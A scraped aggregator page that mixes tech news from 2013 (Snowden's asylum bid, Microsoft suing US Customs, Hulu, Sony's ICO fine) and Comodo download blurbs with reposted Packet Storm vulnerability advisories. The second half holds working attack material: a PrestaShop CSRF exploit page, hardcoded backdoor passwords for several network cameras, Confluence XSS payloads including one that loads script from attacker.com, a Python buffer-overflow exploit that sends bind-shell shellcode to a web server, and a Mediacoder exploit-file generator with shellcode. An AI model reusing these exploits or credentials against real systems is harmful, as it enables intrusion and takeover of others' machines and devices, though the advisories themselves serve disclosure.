Matt

Cornered NSA whistleblower Edward Snowden has surfaced in Moscow's Sheremetevo International Airport - and he's seeking temporary asylum in Russia. Snowden, who blew the lid off the Americans' mass surveillance of the planet's internet, previously requested asylum in the country, but withdrew it after President Vladimir Putin said that would only be possible if the leaker stopped harming the US (he must "cease his work aimed at inflicting damage on our American partners", as the ex-KGB officer put it). But it was revealed during a press conference today that the whistleblower has again applied for political asylum in Moscow to avoid extradition to the States. Snowden sat before the media alongside representatives from WikiLeaks, Amnesty and Human Rights Watch in the airport where he has been in hiding for weeks. The American government, seeking to capture the ex-spook contractor, has been lobbying countries to turn away Snowden, and cancelled his passport shortly before he travelled between Hong Kong and Moscow on 23 May. The US authorities are also suspected of incorrectly warning European nations that Snowden was onboard the presidential jet of Bolivian premier Evo Morales as it flew over Austria from Russia last week. That rumour prompted officials to ground the aircraft in Vienna and search the plane for Snowden. Morales' private jet was en route from an energy conference in Moscow to his home in La Paz, Bolivia. In addition, the US has preemptively filed extradition requests to countries considering offering Snowden a bolt-hole. Nicaragua, Venezuela and Bolivia all said they would offer asylum to the NSA leaker in the wake of the Bolivian president plane inspection, which ignited indignation among left-leaning Latin American governments. That still leaves the problem of how he might reach South American soil without passing through either US or a friendly nation's airspace. Snowden and his team reckon the only way he can guarantee his safety for now, before attempting to obtain asylum in Latin America countries, is to gain temporary asylum in Russia. Snowden's physical security in his precarious position ultimately depends on keeping the Russians on-side so the move makes sense, it would seem. Disappointingly, there was no word from the press conference on what Snowden made of smoking-hot though ineffective former Russian spy-turned-TV-presenter/model Anna Chapman's marriage proposal, which would presumably involve a more permanent stay in Russia. ® Sursa TheRegister.co.uk

Microsoft has filed a lawsuit which claims US Customs officials failed to block imports of Motorola Mobility phones after the agency's ear was bent by Google in a series of secret meetings. The lawsuit was filed on Friday, according to Bloomberg News, and accuses the US Customers and Border Protection (CBP) Agency of failing to enforce an International Trade Commission ban on the import of Motorola Mobility devices which violate some of Microsoft's patents. Microsoft claims that the CBP held secret meetings with Motorola Mobility's owner Google in April which caused the agency to decide in June to continue to let Motorola Mobility phones into the country, going against the ITC's May 2012 decision. "Customs has a clear responsibility to carry out ITC decisions, which are reached after a full trial and rigorous legal review, Microsoft's Deputy General Counsel David Howard is reported to have said in a statement. "Here Customs repeatedly ignored its obligation and did so based on secret discussions." The International Trade Commission order is in effect until April 2018, when Microsoft's patents expires. As is typical of these types of cases, the Microsoft patents in question are as broad as Steve Ballmer's ambition is large, ranging from one for "Generating meeting requests and group scheduling from a mobile device" which was filed in 1998, to one for a "Context sensitive menu system/menu behavior" which was filed in 1996, to the more recent "Method and system for managing changes to a contact database" filed in 2002. In a statement emailed to The Register Google said "US Customs appropriately rejected Microsoft's effort to broaden its patent claims to block Americans from using a wide range of legitimate calendar functions, like scheduling meetings, on their mobile phones. We're confident that the court will agree." Microsoft hopes to compel the CBP agency to enforce the import ban via a court order to make sure it enforces the ban. "The only conclusion that can reasonably be drawn from CBP’s pattern of conduct is that CBP will not enforce the commission's exclusion order absent a court order compelling it to do so," Microsoft is reported to have said in the filing. "CBP has repeatedly allowed Motorola to evade that order based on secret presentations that CBP has refused to share with Microsoft." Apple is also embroiled in a patent dispute that could see an ITC embargo come in against imports of its older iPhone 4 and iPad models, after Samsung convinced the trade body that they infringed on one of its patents. At the time of writing Microsoft had not responded to requests for further information by The Register. The irony of all this is that Google acquired Motorola to give it a strategic warchest of patents to protect it from just this sort of court case. ® Sursa TheRegister.co.uk

Video-streaming site Hulu has opted to walk away from talks about a possible buyout, ending months of speculation as to which media or online giant might snap it up. In a joint statement issued on Friday, co-owners 21st Century Fox, NBCUniversal, and The Walt Disney Company said they won't entertain any further offers for Hulu and will instead maintain their current ownership positions. They will also jointly plunk down another $750m to recapitalize the company, which pulled in $690m in revenue last year. That cash infusion is in the ballpark of what Yahoo! was reportedly offering to buy up Hulu in May. Other potential suitors were said to include AT&T, DirecTV, Time Warner Cable, the talent agency William Morris Endeavor, and some private equity firms. But despite lots of offers, it seems none offered terms that Hulu's co-owners could agree on. "We had meaningful conversations with a number of potential partners and buyers, each with impressive plans and offers to match," 21st Century Fox president and COO Chase Carey said in Friday's joint statement, "but with 21st Century Fox and Disney fully aligned in our collective vision and goals for the business, we decided to continue to empower the Hulu team, in this fashion, to continue the incredible momentum they've built over the last few years." That momentum has made Hulu one of the leading online video sites, with 30 million monthly unique visitors and 4 million paid subscribers. The service now claims to host premium online TV programming from over 400 content partners. This isn't the first time Hulu's co-owners have dangled the company in front of potential buyers only to pull it back, though. They last put it up for sale in 2011, with an asking price of $2bn. But although they got several bids in that range – and Google reportedly offered as much as $4bn – they couldn't reach agreement on any of them. The bids this time were a lot lower. Private equity firm The Chernin Group reportedly bid just $500m – less than Hulu's 2012 revenue. But it's not hard to see why, given how the market for video content is shaping up. In June, Hudson Square analyst Dan Ernst told Forbes that to remain competitive, any Hulu buyer would need to invest in new content to the tune of $2bn per year. "To compete with Netflix and cable, it's a money loser," he said. ® Sursa TheRegister.co.uk

Unfortunately, most firewalls leak. But Comodo's Firewall is unique in that it passes all known leak tests to ensure the integrity of data entering and exiting your system. Comodo has put our firewall through all kinds of sophisticated tests to ensure our firewall is powerful enough to ward off these attacks with default settings. No other firewall has had to work this hard. Take this test yourself. Comodo Firewall secures your system against internal attacks such as Trojans, viruses, malicious software and external attacks by hackers. Safeguard your personal data though a simple user friendly single-click interface offering full immunity to attack. Comodo Personal Firewall helps you connect in a secure way to the internet and global networks. This is the final and first release of Comodo Firewall and contains support for Windows Vista, a new interface and a whole host of improved security features, including host intrusion protection, network-based firewall and an application analysis engine. Note that Comodo Firewall is completely free, even for commercial use. Download : Link

Buy a new PC and you’ll often find it ships pre-installed with an anti-virus client. Sometimes you receive more than basic anti-virus support, but the first thing you need to do is go out and find more extensive security software to make sure your new machine is protected against every possible threat. For this reason, various security developers have resorted to giving away more extensive free software. By combining anti-virus, anti-spyware and a firewall, Comodo have bundled a few of their free applications and published these as an ‘Internet Security’ bundle. Comodo Internet Security is a free suite of security tools designed to protect you against the majority of threats you may encounter when you surf the Internet. This basic Internet Security suite gives you widespread protection, but Comodo also publish a Professional version with additional features such as remote access for removing threats that have infected your PC and have stopped you being able to boot in to your PC. Download : Link

Developed by one of the world’s leading IT security providers, Comodo AntiVirus 2 beta leverages multiple technologies (including on demand & on access scanning, email scanning, process monitoring and worm blocking) to immediately start cleaning or quarantining suspicious files from your hard drives, shared disks, emails, downloads and system memory. Updated virus definitions are automatically downloaded according to a schedule of your choice or by a single click on the 'updater' button. Once installed, Comodo AntiVirus 2 will unobtrusively sit in your system tray, silently and efficiently defending your system from the latest virus outbreaks. It's easy to install and configure, will not slow down your PC by hogging system resources and is free for life to the end user. This free anti-virus client also contains free definition updates for life. There are no catches. Download : Link

Sony has given up its appeal over a fine of £250,000 from the Information Commissioner’s Office (ICO) having originally vowed to fight the case. The firm claimed it has done so in order to avoid revealing information on its security procedures rather than because it now agrees with the fine. The ICO handed the fine to the firm at the start of the year after a hack in 2011 on its PlayStation Network left millions of customers' details exposed, including their addresses, email addresses, dates of birth and account passwords. The ICO said customers' payment card details were also at risk. The ICO's deputy commissioner David Smith said Sony, as a leading technology company, should have been better prepared. "It is a company that trades on its technical expertise, and there's no doubt in my mind that they had access to both the technical knowledge and the resources to keep this information safe," he said when announcing the fine. However, Sony said at the time it would appeal as the breach that exposed the data was the result of a "focused and determined criminal attack". But, writing on Twitter, the ICO said Sony had now dropped its case on the appeal. Sursa V3.co.uk

Description : PrestaShop version 1.5.4 suffers from a cross site request forgery vulnerability Author : Eyup CELIK, EntPro Cyber Security Research Group Source : PrestaShop 1.5.4 Cross Site Request Forgery ? Packet Storm Code : View online: http://demo-store.prestashop.com/en/ * Advisory ID: PRESTASHOP * Version: 1.5.4 * Date: 2013-July-11 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery -------- DESCRIPTION --------------------------------------------------------- With this vulnerability, account passwords and mail adresses could be modified and also products could be added or removed remotely from the shopping cart. -------- SOLUTION ------------------------------------------------------------ There is no solution for this vulnerability at the moment. -------- REPORTED BY --------------------------------------------------------- * EntPro Cyber Security Research Group (www.entpro.com.tr) (Eyüp ÇELÝK, Ýsmail SAYGILI, Gökay BEKÞEN, Ünlü AÐYOL, Yunus Emre KARABULUT) -------- EXPLOIT CODE --------------------------------------------------------- <html> <head> <body> <img src="http://localhost/language/cart?add=&id_product=[Product ID]" width=0 height=0> </body> </head> </html>

Description : Multiple cameras suffer from having hardcoded backdoor accounts allowing for authentication bypass and code execution. Included are various 3S Vision, Asante Voyager, and ALinking cameras. Author : Roberto Paleari Source : 3S Vision / Asante Voyager / ALinking Hardcoded Accounts ? Packet Storm Code : Hard-coded accounts on multiple network cameras =============================================== [ADVISORY INFORMATION] Title: Hard-coded accounts on multiple network cameras Discovery date: 05/06/2013 Release date: 11/07/2013 Advisory URL: http://goo.gl/82Rlb Credits: Roberto Paleari (roberto.paleari@emaze.net, @rpaleari) Alessandro Di Pinto (alessandro.dipinto@emaze.net, @adipinto) [VULNERABILITY INFORMATION] Class: Authentication bypass, command execution [AFFECTED PRODUCTS] We confirm the presence of the security vulnerability on the following products/firmware versions: * 3S Vision N1072 network camera, firmware version v1.07_STD-1 * 3S Vision N1073 network camera, firmware version v1.02_STD-1 * 3S Vision N3071 network camera, firmware version v1.05_STD-1 * Asante Voyager 1 network camera, firmware version v2.08 * Asante Voyager 2 network camera, firmware version v2.08 * ALinking ALC-9451/ALC-9452 network cameras, firmware version v1.33 Several other device manufacturers, models and firmware versions are probably also vulnerable, but they were not checked, mainly due to time constraints. [VULNERABILITY DETAILS] The web server and RTSP daemon of the affected cameras include an hard-coded user account. Different device manufacturers (and camera models) use different hard-coded accounts. This issue can be abused by remote attackers to gain administrative access to the affected devices. In the following, we report the hard-coded accounts for 3S Vision and Asante network cameras, as these are the only device manufacturers that were contacted and replies to our inquiries. - 3S Vision cameras * HTTP & RTSP account: "3sadmin:27988303" - Asante Voyager 1 network cameras * HTTP account: "uniform:uic7799" * RTSP account: "uicrd:xu06m3" - Asante Voyager 2 network cameras * HTTP & RTSP account: "uicrd:xu06m3" As the account is hard-coded in the web server and RTSP server binary files, it cannot be changed by end-users without upgrading the whole firmware image (or manually patching the executable files). [REMEDIATION] Asante provided Emaze with a patched firmware image that disables the hard-coded account. At the time of writing, this software version is still not available through the company's web site, but will probably be released very soon. To the best of our knowledge, other device manufacturers have not addressed the issues described in this advisory, thus no updated firmware versions are available for their products. [COPYRIGHT] Copyright(c) Emaze Networks S.p.A 2013, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. [DISCLAIMER] Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

Description : Atlassian Confluence versions 4.3.5 and below suffer from cross site scripting, cross site flashing, and insufficient framing protection vulnerabilities Author : Andrew Horton (urbanadventurer), Sow Ching Shiong, Mahendra Source : Atlassian Confluence 4.3.5 XSS / Clickjacking ? Packet Storm Code : =============================================================================== BAE Systems Detica Security Advisory: DS-2013-005 =============================================================================== Title: Atlassian Confluence Multiple Issues Version: 4.3.5, and earlier Issue type: Persistent Cross-site Scripting, Persistent Cross-site Flashing, Click Jacking Affected vendor: Atlassian (www.atlassian.com) Release date: 10/07/2013 Discovered by: Andrew Horton, Sow Ching Shiong, Mahendra Issue status: Patch available (unconfirmed) =============================================================================== Summary ------- Security researchers Andrew Horton, Sow Ching Shiong and Mahendra discovered persistent cross-site scripting, persistent cross-site flashing, and insufficient framing protection, vulnerabilities in Confluence version 4.3.5. The latest fully patched version of the application was used at the time of discovery. The persistent cross-site scripting, and cross-site flashing vulnerabilities, enable an attacker with a user account on the Atlassian Confluence web application, to specially craft a Confluence webpage that will hijack the session of users who visit that page. This can be used by an attacker to elevate privileges from a basic user account, to an administrative account after any administrative user visits the webpage. The insufficient framing protection vulnerability enables an attacker without a user account, to lure an authenticated user into following an untrusted link, click on a webpage, and perform unwanted actions. A harmless example is to update a user’s profile with new information. * Persistent Cross-site Scripting The vulnerability is caused by insufficient controls in the application to prevent JavaScript content executing that is included in user uploaded files. When a user uploads a file as an attachment to a wiki page, the web application chooses whether to allow the file to be rendered in-line based on the filename extension and the provided content-type. It is possible to bypass these controls and upload a file containing JavaScript content that will execute JavaScript in a user’s web browser. * Persistent Cross-site Flashing The vulnerability exists because the application has a design flaw that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting. * Insufficient Framing Protection Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing. Persistent Cross-site Scripting Description ============================================ Cross-site scripting vulnerabilities exist when an attacker can cause arbitrary JavaScript into be included within a response from a web application. Persistent cross-site scripting occurs when the JavaScript payload is stored in the web application and presented to another user of the web application at a later time. Throughout most of the Atlassian Confluence web application, there is adequate user input validation and output sanitization to protect against cross-site scripting however the attachment upload functionality can be abused to perform this attack. When a user uploads a file as an attachment to a wiki page, the web application chooses whether to render the content in-line or provide it as a downloadable file depending on the filename extension and the user provided content-type. HTML files are restricted from being rendered in-line. However, it is possible to bypass these controls and upload a file containing JavaScript content that will be rendered as HTML in the web browser. This can be achieved by uploading a filename that does not contain an “HTML” extension, and providing a user supplied content-type that is set to something other than “text/html”. Impact ------ This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript. Affected products ------------------ This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected. Proof of concept ------------------ To demonstrate the persistent cross-site scripting, follow the steps below. 1. Create a file that contains a cross-site scripting payload such as the following example: <html><body><script>alert(1);</script></body></html> 2. Add an attachment to a wiki page. 3. Use your proxy software to intercept the POST request that uploads the attachment file. Alter the user supplied content-type to a value other than “text/html” and ensure that the filename does not contain the suffix, “.html” as shown below. 4. Observe that the attached file has been uploaded. 5. Follow the attached file link and observe that cross-site scripting occurs. Solution --------- * Solution for Atlassian Use a whitelist of allowed content types that can be rendered in-line instead of a blacklist approach which restricts files based on filenames and user provided content-types. Ensure that none of the whitelisted content-types can be used to render HTML which may include scripting content. For unknown and non-whitelisted content types, force the browser to download the file by including the “Content-Disposition: attachment;” HTTP header. * Solution for Confluence users Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved. Persistent Cross-site Flashing Description ========================================== Cross-site flashing vulnerabilities exist when an attacker can cause arbitrary JavaScript into be executed from within a Flash file in a web application. Persistent cross-site scripting occurs when the JavaScript payload is stored in the web application and presented to another user of the web application at a later time. The vulnerability is due to a design flaw in the application that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting. This vulnerability is more easily exploited than the persistent cross-site scripting vulnerability as the JavaScript can be automatically executed upon viewing a webpage on the wiki. A variety of methods are available within the ActionScript language to execute JavaScript from within a Flash file. These methods include, but are not limited to the following examples: * ExternalInterface.call("document.write","<script>alert(1)</script>"); * navigateToURL(new URLRequest("Javascript: document.write(\"<script>alert(1)</scr\"+\"ipt>\")"),"_self") * ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100'); myWindow.document.write(\"<html><head><script src=\'http://attacker.com/evil.js\'></script></head><body>hi</body></html>\");myWindow.focus()"); Impact ------ This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript. Affected products ------------------ This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected. Proof of concept ---------------- To demonstrate the stored cross-site flashing, which is similar in impact to cross-site scripting, follow the steps below. 1. Create a new page in the wiki. 2. Add an attachment, upload an SWF file which triggers JavaScript. A ability to upload an SWF file to the web server is considered insecure in isolation. 3. Insert a media macro object to the wiki page. 4. Select the attachment you just uploaded as the media file ti insert into the page. 5. Verify that the Flash object is embedded within the page. 6. Save the page and verify that the stored cross-site flashing occurs when the page is viewed. In this case, the SWF cause an alert box to popup to demonstrate the ability to execute arbitrary JavaScript. Solution -------- * Solution for Atlassian To prevent user supplied Flash files from interacting with the web application, allow the files to be only accessible via a URL that cannot interact with the web application due to “same origin policies” enforced by the user’s web browser. Require a separate hostname for hosting user supplied content such as SWF files, for example: if the Confluence web application was accessible at https://www.confluence.local, then access media such as Flash files from https://media.confluence.local. * Solution for Confluence users Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved. Insufficient Framing Prevention =============================== Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing. To perform a click jacking attack, an attacker must lure an authenticated user into following an untrusted link, then entice the user into clicking on the web page. The attacker will set up a web page that contains the Confluence web application within an iframe that is made invisible. The user will unwittingly click on a button or link within Confluence causing an unwanted action. The iframe is made invisible by setting the CSS opacity property, it is placed on top of other elements by using the CSS z-index property, and it is lined up with a visible decoy button by using CSS absolute positioning. Frame sniffing attacks require that a user be lured into following an untrusted link. The attack requires placing Confluence within an iframe, then attempting to scroll the iframe to various anchor names. The parent web page can determine whether the scrolling is successful which leaks details about the iframe’s content. Impact ------ Click jacking can be used to perform a limited set of unwanted actions on a user’s behalf. One example of an attack is to update a user’s profile with new information for fields such as ‘About Me’, and to update the user’s website link. This is made possible by the ability to populate form fields by setting URL parameters. Frame sniffing can be used to elicit information from the Confluence web application, for example it can be used to determine which of a set of company names are searchable using the Confluence search functionality. Affected products ----------------- This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected. Proof of concept for Frame Sniffing ------------------------------------ Note that some web browsers provide protection against frame sniffing. Testing was performed using the latest Firefox. To exploit this issue follow these steps: 1. Lure an authenticated user to a webpage that contains a BeEF (Browser Exploitation Framework) hook. 2. Use the iFrame Sniffer module. a. Set the input URL to : https://host.local/dosearchsite.action?queryString=apple b. Set the anchors to check to : search-results-body 3. Click Execute 4. Check the response. If the anchor, #search-results-body exists then the search term ‘apple’ can be found within the Confluence web application. A secondary exploit to determine whether a user is logged in: 1. Lure a user to a webpage that contains a BeEF (Browser Exploitation Framework) hook. 2. Use the iFrame Sniffer module. a. Set the input URL to : https://host.local/login.action b. Set the anchors to check to : forgot-password 3. Click Execute 4. Check the response. If the anchor, #forgot-password exists then the user is not currently logged into the Confluence web application. Proof of concept for Click Jacking ----------------------------------- To exploit this issue follow these steps: 1. Create a web page that contains the following URL in an iframe, a. https://host.local/users/editmyprofile.action?personalInformation=I%20got%20clickjacked&userparam-website=http://phishing.com/ 2. Set the CSS properties for the iframe to: a. z-index:10; opacity:0; 3. Place an image on the web page underneath the ‘Save’ button 4. Lure an authenticated Confluence user into following an untrusted link and clicking Solution -------- * Solution for Atlassian To prevent framing attacks, include the X-Frame-Options HTTP header for all web application web pages. The values for X-Frame-Options are: * DENY – The page cannot be displayed in a frame * SAMEORIGIN – The page can only be displayed in a frame on the same origin as the page itself. * ALLOW-FROM <URI> – The page can only be displayed in a frame on the specified origin Detica recommends using the DENY option. * Solution for Confluence users Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved. Response timeline ------------------ * 04/02/2013 - Vendor notified. * 04/02/2013 - Vendor acknowledges receipt of advisory. * 04/02/2013 - Vendor confirms issue presence and claims they were already aware of some of these issues at https://jira.atlassian.com/browse/CONF-27973. * 21/05/2013 – Vendor advises that these security issues are resolved on their bug tracking JIRA system at https://jira.atlassian.com/browse/CONF-27973. * 10/07/2013 – Detica has not verified the veracity of the vendor resolution. * 10/07/2013 - This advisory is published. References ---------- * Vendor advisory: The vendor, Atlassian has chosen not to issue an advisory. =============================================================================== Vulnerability Disclosure Policy ------------------------------- Detica works extensively with a wide range of software and hardware product vendors internationally to assess and improve the security of the systems they have developed. Our primary interest is ensuring the security of our clients, as well as the broader community of users. To support this purpose, we follow a responsible disclosure policy, consisting broadly of the following approach: Detica will make all reasonable effort to formally contact the vendor and/or manufacturer (via email, telephone and/or facsimile) of the vulnerability, providing as much information as is reasonably possible to enable the vendor to reproduce and fix the identified issues. Detica requests a response from the vendor to this initial communication, acknowledging receipt of the vulnerability report, within one (1) week. If no response has been received, Detica will make a second attempt after one (1) week to contact the vendor, again requesting receipt of the report within one (1) week. Detica will generally allow three (3) months for a patch to be released which satisfactorily remediates the vulnerability, prior to disclosure. The three (3) month period will begin upon the first attempt by Detica to contact the vendor. If either time frame elapses without sufficient explanation, Detica may issue a public advisory about the elevated level of risk posed by running the vendor’s product. Detica reserves the exclusive right to publicly release details provided to the vendor before a patch or effective mitigation has been released. Detica similarly reserves the right to communicate details of the vulnerabilities to our clients and partners, under non-disclosure agreement, to enable them to take any available protective measures prior to the vendor’s patch being released. When a patch or other acknowledgement of this issue is released by the vendor, we request attribution of the research contained in this report to Detica (http://www.baesystemsdetica.com.au ). Detica research can be contacted at research@baesystemsdetica.com.au. About BAE Systems Detica ------------------------- At Detica, we specialise in providing information security consulting and testing services for government and commercial clients. Established in 2004, we’re now one of the leading independent information security companies in the Australasian and SE-Asian region. We employ in excess of 40 permanent and contract staff in offices throughout Australia and in Singapore and Malaysia. All of our people are experienced security professionals, and each is a leading specialist in their field. We have the experience, the industry knowledge and expertise to deliver effective, measurable outcomes for business and government clients. Our direct and pragmatic Australian approach to what is generally a complex business area has been a major advantage. This approach has enabled Detica to engage and win contracts with Australian and State Government agencies and major international software companies and governments, despite competition from large multinational players. We have genuine expertise in delivering consulting and testing services to major clients in the Defence & National Security, Financial Services, Government, Health & Human Services, ICT and Critical National Infrastructure industries. Understanding the importance of information security in the business and wider community, we are a sponsor of the Australian Information Industry Association (AIIA); Internet Industry Association (IIA) SME security portal; and provides pro-bono consulting services and financial support to The Inspire Foundation and Reachout! - a service that uses the Internet to provide much-needed information, assistance and referrals to young people going through tough times. For more information contact us are visit our website http://www.baesystemsdetica.com.au/ or email us at info@baesystemsdetica.com ===============================================================================

Description : DD-WRT suffers from cross site request forgery and remote command injection vulnerabilities. Author : cyoung Source : DD-WRT 24-sp2 CSRF / Command Injection ? Packet Storm Code : DD-WRT v24-sp2 is prone to command injection from specially crafted configuration values containing shell meta-characters. A remote attacker can potentially use CSRF from an authenticated client to execute commands on the router as the root user. Successful exploitation can result in system wide compromise or a denial of service condition depending on the commands being injected. This bug was reported via the DD-WRT bug tracker on November 20, 2012 but there does not appear to be ongoing development in the project.

Description : Ultra Mini HTTPd version 1.21 suffers from a stack buffer overflow vulnerability. This exploit binds a shell. Author : superkojiman Source : Ultra Mini HTTPd 1.21 Buffer Overflow ? Packet Storm Code : # Exploit Title: Ultra Mini HTTPD stack buffer overflow # Date: 10 July 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.picolix.jp/ # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html # Version: 1.21 # Tested on: Windows XP Professional SP2, English # # Description: # A buffer overflow is triggered when requesting a very long # resource name. # import socket import struct # msfpayload windows/shell_bind_tcp R | \ # msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c" # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shellcode = ( "\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9" + "\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d" + "\xc6\x1e\xa4\x9e\x16\x41\x2c\x7b\x27\x53\x4a\x0f\x15\x63" + "\x18\x5d\x95\x08\x4c\x76\x2e\x7c\x59\x79\x87\xcb\xbf\xb4" + "\x18\xfa\x7f\x1a\xda\x9c\x03\x61\x0e\x7f\x3d\xaa\x43\x7e" + "\x7a\xd7\xab\xd2\xd3\x93\x19\xc3\x50\xe1\xa1\xe2\xb6\x6d" + "\x99\x9c\xb3\xb2\x6d\x17\xbd\xe2\xdd\x2c\xf5\x1a\x56\x6a" + "\x26\x1a\xbb\x68\x1a\x55\xb0\x5b\xe8\x64\x10\x92\x11\x57" + "\x5c\x79\x2c\x57\x51\x83\x68\x50\x89\xf6\x82\xa2\x34\x01" + "\x51\xd8\xe2\x84\x44\x7a\x61\x3e\xad\x7a\xa6\xd9\x26\x70" + "\x03\xad\x61\x95\x92\x62\x1a\xa1\x1f\x85\xcd\x23\x5b\xa2" + "\xc9\x68\x38\xcb\x48\xd5\xef\xf4\x8b\xb1\x50\x51\xc7\x50" + "\x85\xe3\x8a\x3c\x6a\xde\x34\xbd\xe4\x69\x46\x8f\xab\xc1" + "\xc0\xa3\x24\xcc\x17\xc3\x1f\xa8\x88\x3a\x9f\xc9\x81\xf8" + "\xcb\x99\xb9\x29\x73\x72\x3a\xd5\xa6\xd5\x6a\x79\x18\x96" + "\xda\x39\xc8\x7e\x31\xb6\x37\x9e\x3a\x1c\x4e\x98\xf4\x44" + "\x03\x4f\xf5\x7a\xb2\xd3\x70\x9c\xde\xfb\xd4\x36\x76\x3e" + "\x03\x8f\xe1\x41\x61\xa3\xba\xd5\x3d\xad\x7c\xd9\xbd\xfb" + "\x2f\x76\x15\x6c\xbb\x94\xa2\x8d\xbc\xb0\x82\xc4\x85\x53" + "\x58\xb9\x44\xc5\x5d\x90\x3e\x66\xcf\x7f\xbe\xe1\xec\xd7" + "\xe9\xa6\xc3\x21\x7f\x5b\x7d\x98\x9d\xa6\x1b\xe3\x25\x7d" + "\xd8\xea\xa4\xf0\x64\xc9\xb6\xcc\x65\x55\xe2\x80\x33\x03" + "\x5c\x67\xea\xe5\x36\x31\x41\xac\xde\xc4\xa9\x6f\x98\xc8" + "\xe7\x19\x44\x78\x5e\x5c\x7b\xb5\x36\x68\x04\xab\xa6\x97" + "\xdf\x6f\xd6\xdd\x7d\xd9\x7f\xb8\x14\x5b\xe2\x3b\xc3\x98" + "\x1b\xb8\xe1\x60\xd8\xa0\x80\x65\xa4\x66\x79\x14\xb5\x02" + "\x7d\x8b\xb6\x06" ) # 7C941EED , JMP ESP , ntdll.dll payload = "A" * 5392 + struct.pack("<I", 0x7C941EED) payload += "\x81\xc4\xf0\xea\xff\xff" + shellcode + "B" * 4230 print "[+] sending payload, length", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.175", 80)) buf = ( "GET /" + payload + " HTTP/1.1\r\n" + "Host: 192.168.37.175" + "\r\n\r\n" ) s.send(buf) s.close()

Description : Mediacoder version 0.8.23.5530 SEH buffer overflow exploit that spawns calc.exe Author : metacom Source : Mediacoder 0.8.23.5530 SEH Buffer Overflow ? Packet Storm Code : #!/usr/bin/python print """ [+]Exploit Title: Mediacoder 0.8.23.5530 SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.23.5530 [+]Vulnerabilities File Format:lst,m3u [+]Other programs from http://www.mediacoderhq.com/editions.html not tested and may be vulnerable [+]Date (found): 17.07.2013 [+]Date (publish): 17.07.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "\x41" * 845 nseh = "\xEB\x06\x90\x90" seh= "\xD0\x12\xB0\x6A"# 6AB012D0 5F POP EDI nops= "\x90" * 70 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") junk = buffer + nseh + seh + nops + shell filename = "exploit.lst";#You can change the format m3u file = open(filename,"w") file.writelines(junk) file.close() print "File Is created"

